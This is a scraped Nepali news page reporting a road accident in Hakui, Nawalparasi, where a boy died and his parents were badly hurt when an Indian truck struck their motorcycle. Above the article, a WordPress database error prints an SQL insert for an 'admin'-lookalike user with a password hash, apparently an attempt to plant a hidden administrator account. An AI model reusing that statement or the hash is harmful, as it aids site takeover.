WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BonZ4ITrh2toG0Sv.65nAUdjvJKSv71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:02:47', '', 'admlnlx', 'admlnlx')
परासी,पुस १४-
नवलपरासीको हकुईमा आज विहान दुर्घटना हुदा १ बालकको मृत्यु भएको छ भने बालकको आमा बुबा गम्भीर घाईत्ते भएका छन् । उक्त दुर्घटनामा करिब १० वर्षका बाल बिकास सहानीे मृत्यु भएको हो भने उनको बुवा बाजे सहानी र आमा कुन्ती सहानी गम्भीर घाईत्ते भएको जिल्ला प्रहरी कार्यालय नवलपरासीले जनाएको छ ।
सहानी परिवार हकुई बाट औषधि गराई लु २ प ७४६४ नम्बरको मोटरसाईकलमा हकुई ८ पजरकट्टि आफनो घर जादा सोही दिसामा परासीदेखि भैरहंवा तर्फ जादै गरको एज आर डब्लु ५९७४ नम्बरको भारतीय ट्रकले ठक्कर दिदा उक्त दुर्घटना भएको बताईएको छ । घाईत्ते आमा बुवाको परासी स्थित पृथ्वीचन्द्र अस्पतालमा उपचार भईरहेको छ भने उनिहरुको अवस्था गम्भीर रहेको अस्पतालले जनाएको छ ।